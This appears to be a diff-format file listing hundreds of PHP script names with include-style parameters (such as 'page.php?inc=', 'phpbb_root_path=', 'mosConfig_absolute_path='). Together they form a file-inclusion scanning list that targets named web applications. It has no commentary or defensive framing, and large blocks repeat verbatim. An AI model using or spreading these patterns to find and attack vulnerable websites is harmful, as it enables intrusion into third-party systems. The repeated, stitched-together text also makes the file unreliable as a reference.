+template.php?texto=
+index3.php?ir=
+print.php?chapter=
+file.php?inc=
+file.php?cont=
+view.php?cmd=
+include.php?chapter=
+path.php?my=
+principal.php?param=
+general.php?menue=
+index1.php?b=
+info.php?chapter=
+nota.php?chapter=
+general.php?include=
+start.php?addr=
+index1.php?qry=
+index1.php?loc=
+page.php?addr=
+index1.php?dir=
+principal.php?pr=
+press.php?seite=
+head.php?cmd=
+home.php?sec=
+home.php?category=
+standard.php?cmd=
+mod*.php?thispage=
+base.php?to=
+view.php?choix=
+base.php?panel=
+template.php?mod=
+info.php?j=
+blank.php?pref=
+sub*.php?channel=
+standard.php?in=
+general.php?cmd=
+pagina.php?panel=
+template.php?where=
+path.php?channel=
+gery.php?seccion=
+page.php?tipo=
+sitio.php?rub=
+pagina.php?u=
+file.php?ir=
+*inc*.php?sivu=
+path.php?start=
+page.php?chapter=
+home.php?recipe=
+enter.php?pname=
+layout.php?path=
+print.php?open=
+mod*.php?channel=
+down*.php?phpbb_root_path=
+*inc*.php?str=
+gery.php?phpbb_root_path=
+include.php?middlePart=
+sub*.php?destino=
+info.php?read=
+home.php?sp=
+main.php?strona=
+sitio.php?get=
+sitio.php?index=
+index3.php?option=
+enter.php?a=
+main.php?second=
+print.php?pname=
+blank.php?itemnav=
+blank.php?pagina=
+index1.php?d=
+down*.php?where=
+*inc*.php?include=
+path.php?pre=
+home.php?loader=
+start.php?eval=
+index.php?disp=
+head.php?mod=
+sitio.php?section=
+nota.php?doshow=
+home.php?seite=
+home.php?a=
+page.php?url=
+pagina.php?left=
+layout.php?c=
+principal.php?goto=
+standard.php?base_dir=
+home.php?where=
+page.php?sivu=
+*inc*.php?adresa=
+padrao.php?str=
+include.php?my=
+show.php?home=
+index.php?load=
+index3.php?rub=
+sub*.php?str=
+start.php?index=
+nota.php?mod=
+sub*.php?mid=
+index1.php?*[*]*=
+pagina.php?oldal=
+padrao.php?loc=
+padrao.php?rub=
+page.php?incl=
+gery.php?disp=
+nota.php?oldal=
+include.php?u=
+principal.php?pagina=
+print.php?choix=
+head.php?filepath=
+include.php?corpo=
+sub*.php?action=
+head.php?pname=
+press.php?dir=
+show.php?xlink=
+file.php?left=
+nota.php?destino=
+general.php?module=
+index3.php?redirect=
+down*.php?param=
+default.php?ki=
+padrao.php?h=
+padrao.php?read=
+mod*.php?cont=
+
+index1.php?l=
+down*.php?pr=
+gery.php?viewpage=
+template.php?load=
+nota.php?pr=
+padrao.php?destino=
+index2.php?channel=
+principal.php?opcion=
+start.php?str=
+press.php?*[*]*=
+index.php?ev=
+pagina.php?pre=
+nota.php?content=
+include.php?adresa=
+sitio.php?t=
+index.php?sivu=
+principal.php?q=
+path.php?ev=
+print.php?module=
+index.php?loc=
+nota.php?basepath=
+padrao.php?tipo=
+index2.php?in=
+principal.php?eval=
+file.php?qry=
+info.php?t=
+enter.php?play=
+general.php?var=
+principal.php?s=
+standard.php?pagina=
+standard.php?subject=
+base.php?second=
+head.php?inc=
+pagina.php?basepath=
+main.php?pname=
+*inc*.php?modo=
+include.php?goto=
+file.php?pg=
+head.php?g=
+general.php?header=
+start.php?*root*=
+enter.php?pref=
+index3.php?open=
+start.php?module=
+main.php?load=
+enter.php?pg=
+padrao.php?redirect=
+pagina.php?my=
+gery.php?pre=
+enter.php?w=
+info.php?texto=
+enter.php?open=
+base.php?rub=
+gery.php?*[*]*=
+include.php?cmd=
+standard.php?dir=
+layout.php?page=
+index3.php?pageweb=
+include.php?numero=
+path.php?destino=
+index3.php?home=
+default.php?seite=
+path.php?eval=
+base.php?choix=
+template.php?cont=
+info.php?pagina=
+default.php?x=
+default.php?option=
+gery.php?ki=
+down*.php?second=
+blank.php?path=
+pagina.php?v=
+file.php?pollname=
+index3.php?var=
+layout.php?goto=
+pagina.php?incl=
+home.php?action=
+include.php?oldal=
+print.php?left=
+print.php?u=
+nota.php?v=
+home.php?str=
+press.php?panel=
+page.php?mod=
+default.php?param=
+down*.php?texto=
+mod*.php?dir=
+view.php?where=
+blank.php?subject=
+path.php?play=
+base.php?l=
+index2.php?rub=
+general.php?opcion=
+layout.php?xlink=
+padrao.php?name=
+pagina.php?nivel=
+default.php?oldal=
+template.php?k=
+main.php?chapter=
+layout.php?chapter=
+layout.php?incl=
+include.php?url=
+base.php?sivu=
+index.php?link=
+sub*.php?cont=
+info.php?oldal=
+general.php?rub=
+default.php?str=
+head.php?ev=
+sub*.php?path=
+view.php?page=
+main.php?j=
+index2.php?basepath=
+gery.php?qry=
+main.php?url=
+default.php?incl=
+show.php?redirect=
+index1.php?pre=
+general.php?base_dir=
+start.php?in=
+show.php?abre=
+index1.php?home=
+home.php?ev=
+index2.php?ki=
+base.php?pag=
+default.php?ir=
+general.php?qry=
+index2.php?home=
+press.php?nivel=
+enter.php?pr=
+blank.php?loader=
+start.php?cmd=
+padrao.php?d=
+sitio.php?recipe=
+principal.php?read=
+standard.php?showpage=
+main.php?pg=
+page.php?panel=
+press.php?addr=
+template.php?s=
+main.php?tipo=
+*inc*.php?ev=
+padrao.php?page=
+show.php?thispage=
+home.php?secao=
+main.php?start=
+enter.php?mid=
+press.php?id=
+main.php?inc=
+index3.php?cmd=
+index.php?pname=
+press.php?subject=
+include.php?sec=
+index3.php?xlink=
+general.php?texto=
+index3.php?go=
+index.php?cmd=
+index3.php?disp=
+index3.php?left=
+sub*.php?middle=
+show.php?modo=
+index1.php?pagina=
+head.php?left=
+enter.php?phpbb_root_path=
+show.php?z=
+start.php?basepath=
+blank.php?strona=
+template.php?y=
+page.php?where=
+layout.php?category=
+index1.php?my=
+principal.php?phpbb_root_path=
+nota.php?channel=
+page.php?choix=
+start.php?xlink=
+home.php?k=
+standard.php?phpbb_root_path=
+principal.php?middlePart=
+mod*.php?m=
+index.php?recipe=
+template.php?path=
+pagina.php?dir=
+sitio.php?abre=
+index1.php?recipe=
+blank.php?page=
+sub*.php?category=
+*inc*.php?bOdy=
+enter.php?middle=
+home.php?path=
+down*.php?pre=
+base.php?w=
+main.php?path=
+nota.php?ir=
+press.php?link=
+gery.php?pollname=
+down*.php?open=
+down*.php?pageweb=
+default.php?eval=
+view.php?showpage=
+show.php?get=
+sitio.php?tipo=
+layout.php?cont=
+default.php?destino=
+padrao.php?seccion=
+down*.php?r=
+main.php?param=
+standard.php?e=
+down*.php?in=
+nota.php?include=
+sitio.php?secao=
+print.php?my=
+general.php?abre=
+general.php?link=
+default.php?id=
+standard.php?panel=
+show.php?channel=
+enter.php?r=
+index3.php?phpbb_root_path=
+gery.php?where=
+head.php?middle=
+sub*.php?load=
+gery.php?sp=
+show.php?chapter=
+sub*.php?b=
+general.php?adresa=
+print.php?goto=
+sub*.php?sp=
+template.php?doshow=
+padrao.php?base_dir=
+index2.php?my=
+include.php?w=
+start.php?op=
+main.php?section=
+view.php?header=
+layout.php?menue=
+head.php?y=
+sub*.php?content=
+show.php?type=
+base.php?id=
+mod*.php?qry=
+default.php?strona=
+sitio.php?chapter=
+gery.php?index=
+nota.php?h=
+page.php?oldal=
+enter.php?panel=
+blank.php?t=
+start.php?pollname=
+sub*.php?module=
+enter.php?thispage=
+mod*.php?index=
+sitio.php?r=
+sub*.php?play=
+index2.php?doshow=
+index2.php?chapter=
+show.php?path=
+gery.php?to=
+info.php?base_dir=
+gery.php?abre=
+gery.php?pag=
+view.php?channel=
+default.php?mod=
+index.php?op=
+general.php?pre=
+padrao.php?type=
+template.php?pag=
+standard.php?pre=
+blank.php?ref=
+down*.php?z=
+general.php?inc=
+home.php?read=
+pagina.php?section=
+default.php?basepath=
+index.php?pre=
+sitio.php?pageweb=
+base.php?seite=
+*inc*.php?j=
+index2.php?filepath=
+file.php?type=
+index1.php?oldal=
+index2.php?second=
+index3.php?sekce=
+info.php?filepath=
+base.php?opcion=
+path.php?category=
+index3.php?start=
+start.php?rub=
+*inc*.php?i=
+blank.php?pre=
+general.php?channel=
+index2.php?OpenPage=
+page.php?section=
+mod*.php?middle=
+index1.php?goFile=
+blank.php?action=
+principal.php?loader=
+sub*.php?op=
+main.php?addr=
+start.php?mid=
+gery.php?secao=
+pagina.php?tipo=
+index.php?w=
+head.php?where=
+principal.php?tipo=
+press.php?loader=
+gery.php?showpage=
+gery.php?go=
+enter.php?start=
+press.php?lang=
+general.php?p=
+index.php?sekce=
+index2.php?get=
+sitio.php?go=
+include.php?cont=
+sub*.php?where=
+index3.php?index=
+path.php?recipe=
+info.php?loader=
+print.php?sp=
+page.php?phpbb_root_path=
+path.php?bOdy=
+principal.php?menue=
+print.php?cont=
+pagina.php?z=
+default.php?mid=
+blank.php?xlink=
+
+sub*.php?oldal=
+general.php?b=
+include.php?left=
+print.php?sivu=
+press.php?OpenPage=
+default.php?cont=
+general.php?pollname=
+template.php?nivel=
+enter.php?page=
+file.php?middle=
+standard.php?str=
+gery.php?get=
+main.php?v=
+down*.php?subject=
+enter.php?sivu=
+path.php?option=
+index.php?strona=
+index1.php?choix=
+index2.php?f=
+press.php?destino=
+pagina.php?channel=
+principal.php?b=
+home.php?include=
+head.php?numero=
+general.php?ref=
+main.php?dir=
+gery.php?cont=
+principal.php?type=
+file.php?param=
+default.php?secao=
+path.php?pageweb=
+info.php?r=
+base.php?phpbb_root_path=
+main.php?itemnav=
+view.php?pg=
+pagina.php?choix=
+default.php?itemnav=
+index2.php?cmd=
+layout.php?url=
+index.php?path=
+index1.php?second=
+start.php?modo=
+index1.php?get=
+index3.php?my=
+sub*.php?left=
+print.php?inc=
+view.php?type=
+path.php?*[*]*=
+base.php?adresa=
+index3.php?oldal=
+standard.php?bOdy=
+base.php?path=
+principal.php?strona=
+info.php?l=
+template.php?left=
+head.php?loc=
+page.php?ir=
+print.php?path=
+down*.php?path=
+sitio.php?opcion=
+pagina.php?category=
+press.php?menu=
+index2.php?pref=
+sitio.php?incl=
+show.php?ki=
+index3.php?x=
+page.php?strona=
+*inc*.php?open=
+index3.php?secao=
+standard.php?*[*]*=
+template.php?basepath=
+standard.php?goFile=
+index2.php?ir=
+file.php?modo=
+gery.php?itemnav=
+main.php?oldal=
+down*.php?showpage=
+start.php?destino=
+blank.php?rub=
+path.php?ir=
+layout.php?var=
+index1.php?texto=
+start.php?pg=
+index1.php?showpage=
+info.php?go=
+path.php?load=
+index3.php?abre=
+blank.php?where=
+info.php?start=
+page.php?secao=
+nota.php?pag=
+nota.php?second=
+index2.php?to=
+standard.php?name=
+start.php?strona=
+mod*.php?numero=
+press.php?home=
+info.php?z=
+mod*.php?path=
+blank.php?base_dir=
+base.php?texto=
+nota.php?secc=
+index.php?tipo=
+index.php?goto=
+print.php?pag=
+view.php?secao=
+general.php?strona=
+show.php?my=
+page.php?e=
+padrao.php?index=
+gery.php?thispage=
+start.php?base_dir=
+default.php?tipo=
+gery.php?panel=
+standard.php?ev=
+standard.php?destino=
+general.php?middle=
+main.php?basepath=
+standard.php?q=
+index1.php?tipo=
+mod*.php?choix=
+template.php?ir=
+show.php?adresa=
+general.php?mid=
+index3.php?adresa=
+pagina.php?sec=
+template.php?secao=
+home.php?w=
+general.php?content=
+sub*.php?recipe=
+main.php?category=
+enter.php?viewpage=
+main.php?ir=
+show.php?pageweb=
+principal.php?ir=
+default.php?pageweb=
+index.php?oldal=
+head.php?d=
+gery.php?mid=
+index.php?type=
+standard.php?j=
+show.php?oldal=
+enter.php?link=
+enter.php?content=
+blank.php?filepath=
+standard.php?channel=
+base.php?*[*]*=
+info.php?incl=
+down*.php?include=
+press.php?modo=
+file.php?choix=
+press.php?type=
+blank.php?goto=
+index3.php?showpage=
+principal.php?subject=
+start.php?chapter=
+show.php?r=
+pagina.php?thispage=
+general.php?chapter=
+page.php?base_dir=
+page.php?qry=
+show.php?incl=
+page.php?*[*]*=
+main.php?h=
+file.php?seccion=
+default.php?pre=
+principal.php?index=
+principal.php?inc=
+home.php?z=
+pagina.php?in=
+show.php?play=
+nota.php?subject=
+default.php?secc=
+default.php?loader=
+padrao.php?var=
+mod*.php?b=
+default.php?showpage=
+press.php?channel=
+pagina.php?ev=
+sitio.php?name=
+page.php?option=
+press.php?mid=
+down*.php?corpo=
+view.php?get=
+print.php?thispage=
+principal.php?home=
+show.php?param=
+standard.php?sivu=
+index3.php?panel=
+include.php?play=
+path.php?cmd=
+file.php?sp=
+template.php?section=
+view.php?str=
+blank.php?left=
+nota.php?lang=
+path.php?sivu=
+main.php?e=
+default.php?ref=
+start.php?seite=
+default.php?inc=
+print.php?disp=
+home.php?h=
+principal.php?loc=
+index3.php?sp=
+gery.php?var=
+sub*.php?base_dir=
+path.php?middle=
+pagina.php?str=
+base.php?play=
+base.php?v=
+sitio.php?sivu=
+main.php?r=
+file.php?nivel=
+start.php?sivu=
+template.php?c=
+general.php?second=
+sub*.php?mod=
+home.php?loc=
+head.php?corpo=
+standard.php?op=
+index2.php?inc=
+info.php?pref=
+base.php?basepath=
+print.php?basepath=
+*inc*.php?m=
+base.php?home=
+layout.php?strona=
+padrao.php?url=
+sitio.php?oldal=
+pagina.php?read=
+index1.php?go=
+standard.php?s=
+page.php?eval=
+index.php?j=
+pagina.php?pr=
+start.php?secao=
+template.php?*[*]*=
+nota.php?get=
+index3.php?link=
+home.php?e=
+gery.php?name=
+nota.php?eval=
+sub*.php?abre=
+index2.php?load=
+principal.php?in=
+view.php?load=
+mod*.php?action=
+default.php?p=
+head.php?c=
+template.php?viewpage=
+view.php?mid=
+padrao.php?addr=
+view.php?go=
+file.php?basepath=
+home.php?pre=
+include.php?goFile=
+layout.php?play=
+index1.php?subject=
+info.php?middlePart=
+down*.php?pg=
+sub*.php?bOdy=
+index.php?option=
+sub*.php?chapter=
+default.php?t=
+head.php?opcion=
+nota.php?panel=
+sitio.php?left=
+show.php?include=
+pagina.php?start=
+head.php?choix=
+index3.php?tipo=
+index3.php?choix=
+down*.php?channel=
+base.php?pa=
+nota.php?sekce=
+show.php?l=
+show.php?index=
+blank.php?url=
+start.php?thispage=
+nota.php?play=
+show.php?second=
+enter.php?include=
+principal.php?middle=
+main.php?where=
+padrao.php?link=
+path.php?strona=
+index3.php?read=
+mod*.php?module=
+standard.php?viewpage=
+standard.php?pr=
+*inc*.php?showpage=
+pagina.php?ref=
+path.php?pname=
+padrao.php?mid=
+info.php?eval=
+include.php?path=
+page.php?subject=
+sub*.php?qry=
+head.php?module=
+nota.php?opcion=
+head.php?abre=
+base.php?str=
+home.php?bOdy=
+gery.php?module=
+head.php?sivu=
+page.php?inc=
+pagina.php?header=
+mod*.php?v=
+home.php?doshow=
+padrao.php?n=
+index1.php?chapter=
+padrao.php?basepath=
+index.php?r=
+index3.php?seccion=
+sitio.php?mid=
+index.php?where=
+general.php?type=
+
+pagina.php?goto=
+page.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
+index1.php?pg=
+print.php?in=
+general.php?modo=
+head.php?ki=
+press.php?my=
+index1.php?pollname=
+principal.php?to=
+default.php?play=
+page.php?g=
+nota.php?pg=
+blank.php?destino=
+blank.php?z=
+components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
+module_db.php?pivot_path= module_db.php?pivot_path=
+/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=
+components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
+com_extended_registration
+smarty_config.php?root_dir= smarty
+include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
+send_reminders.php?includedir= send_reminders.php?includedir=
+components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
+inc/functions.inc.php?config[ppa_root_path]= Index Albums index.php
+/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg
+[Script Path]/admin/index.php?o= admin/index.php;
+/admin/index.php?o= admin/index.php;
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
+admin/doeditconfig.php?thispath=../includes&config[path]= admin
+/components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+components/com_simpleboard/image_upload.php?sbp= com_simpleboard
+/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
+mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
+zentrack/index.php?configFile=
+inst/index.php?lng=../../include/main.inc&G_PATH=
+pivot/modules/module_db.php?pivot_path=
+include/write.php?dir=
+includes/header.php?systempath=
+becommunity/community/index.php?pageurl=
+agendax/addevent.inc.php?agendax_path=
+myPHPCalendar/admin.php?cal_dir=
+yabbse/Sources/Packages.php?sourcedir=
+zboard/zboard.php
+path_of_cpcommerce/_functions.php?prefixpage.php?pa=
+default.php?menue=
+main.php?goto=
+index1.php?abre=
+info.php?seccion=
+index2.php?pa=
+layout.php?pageweb=
+nota.php?disp=
+index1.php?bOdy=
+default.php?nivel=
+show.php?header=
+down*.php?pag=
+start.php?tipo=
+standard.php?w=
+index.php?open=
+blank.php?menu=
+general.php?nivel=
+padrao.php?nivel=
+*inc*.php?addr=
+index.php?var=
+home.php?redirect=
+*inc*.php?link=
+*inc*.php?incl=
+padrao.php?corpo=
+down*.php?url=
+enter.php?goto=
+down*.php?addr=
+sub*.php?j=
+principal.php?f=
+sub*.php?menue=
+index2.php?section=
+general.php?my=
+head.php?loader=
+general.php?goto=
+include.php?dir=
+start.php?header=
+blank.php?in=
+base.php?name=
+nota.php?goFile=
+head.php?base_dir=
+mod*.php?recipe=
+press.php?pr=
+padrao.php?*[*]*=
+layout.php?opcion=
+print.php?rub=
+index.php?pr=
+general.php?seite=
+pagina.php?numero=
+*inc*.php?pg=
+nota.php?rub=
+view.php?seite=
+pagina.php?recipe=
+index.php?pref=
+page.php?action=
+page.php?ev=
+show.php?ir=
+head.php?index=
+mod*.php?pname=
+view.php?ir=
+*inc*.php?start=
+principal.php?rub=
+principal.php?corpo=
+padrao.php?middle=
+base.php?pname=
+template.php?header=
+view.php?sp=
+main.php?name=
+nota.php?m=
+blank.php?open=
+head.php?dir=
+page.php?pname=
+*inc*.php?k=
+index.php?pollname=
+head.php?oldal=
+index1.php?str=
+template.php?choix=
+down*.php?pollname=
+page.php?recipe=
+template.php?corpo=
+nota.php?sec=
+info.php?*[*]*=
+sub*.php?*[*]*=
+page.php?q=
+index1.php?type=
+gery.php?y=
+standard.php?lang=
+gery.php?page=
+index.php?action=
+press.php?pname=
+down*.php?v=
+index3.php?second=
+show.php?recipe=
+main.php?pre=
+file.php?numero=
+print.php?str=
+standard.php?link=
+nota.php?OpenPage=
+view.php?pollname=
+print.php?l=
+index.php?go=
+standard.php?numero=
+view.php?pr=
+down*.php?read=
+down*.php?action=
+index1.php?OpenPage=
+principal.php?left=
+mod*.php?start=
+file.php?bOdy=
+gery.php?pg=
+blank.php?qry=
+base.php?eval=
+default.php?left=
+gery.php?param=
+blank.php?pa=
+nota.php?b=
+path.php?loader=
+start.php?o=
+include.php?include=
+nota.php?corpo=
+enter.php?second=
+sub*.php?pname=
+mod*.php?pageweb=
+principal.php?addr=
+standard.php?action=
+template.php?lang=
+include.php?basepath=
+sub*.php?ir=
+down*.php?nivel=
+path.php?opcion=
+print.php?category=
+print.php?menu=
+layout.php?secao=
+template.php?param=
+standard.php?ref=
+base.php?include=
+blank.php?bOdy=
+path.php?pref=
+print.php?g=
+padrao.php?subject=
+nota.php?modo=
+index3.php?loader=
+template.php?seite=
+general.php?pageweb=
+index2.php?param=
+path.php?nivel=
+page.php?pref=
+press.php?pref=
+enter.php?ev=
+standard.php?middle=
+index2.php?recipe=
+blank.php?dir=
+home.php?pageweb=
+view.php?panel=
+down*.php?home=
+head.php?ir=
+mod*.php?ir=
+show.php?pagina=
+default.php?base_dir=
+show.php?loader=
+path.php?mid=
+blank.php?abre=
+down*.php?choix=
+info.php?opcion=
+page.php?loader=
+principal.php?oldal=
+index1.php?load=
+home.php?content=
+pagina.php?sekce=
+file.php?n=
+include.php?redirect=
+print.php?itemnav=
+enter.php?index=
+print.php?middle=
+sitio.php?goFile=
+head.php?include=
+enter.php?e=
+index.php?play=
+enter.php?id=
+view.php?mod=
+show.php?nivel=
+file.php?channel=
+layout.php?choix=
+info.php?bOdy=
+include.php?go=
+index3.php?nivel=
+sub*.php?include=
+path.php?numero=
+principal.php?header=
+main.php?opcion=
+enter.php?s=
+sub*.php?pre=
+include.php?index=
+gery.php?pageweb=
+padrao.php?path=
+info.php?url=
+press.php?ev=
